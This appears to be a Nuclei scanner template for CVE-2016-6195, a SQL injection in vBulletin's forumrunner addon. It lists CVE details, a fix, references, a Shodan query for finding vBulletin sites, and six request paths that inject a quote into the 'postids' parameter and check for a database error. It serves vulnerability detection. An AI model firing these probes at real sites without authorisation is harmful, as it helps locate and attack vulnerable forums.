id: CVE-2016-6195 info: name: vBulletin <= 4.2.3 - SQL Injection author: MaStErChO severity: critical description: | vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database. remediation: | Upgrade to a patched version of vBulletin (4.2.4 or later) or apply the official patch provided by the vendor. reference: - https://www.cvedetails.com/cve/CVE-2016-6195/ - https://www.exploit-db.com/exploits/38489 - https://enumerated.wordpress.com/2016/07/11/1/ - http://www.vbulletin.org/forum/showthread.php?t=322848 - https://github.com/drewlong/vbully classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-6195 cwe-id: CWE-89 epss-score: 0.00284 epss-percentile: 0.65202 cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:* metadata: verified: "true" max-request: 6 vendor: vbulletin product: vbulletin shodan-query: title:"Powered By vBulletin" tags: cve,cve2016,vbulletin,sqli,forum,edb http: - method: GET path: - "{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" - "{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" - "{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" - "{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" - "{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" - "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27" stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - "type=dberror" - type: status status: - 200 - 503 condition: or # digest: 4a0a004730450220148de5e061a5fe3c6251106bab498d7528013e666aa29dec23d9e56137ecc6e3022100bff36120bf8be39928532a80d88f9b499c3209b24b6514ec62efea47503690e7:922c64590222798bb761d5b6d8e72950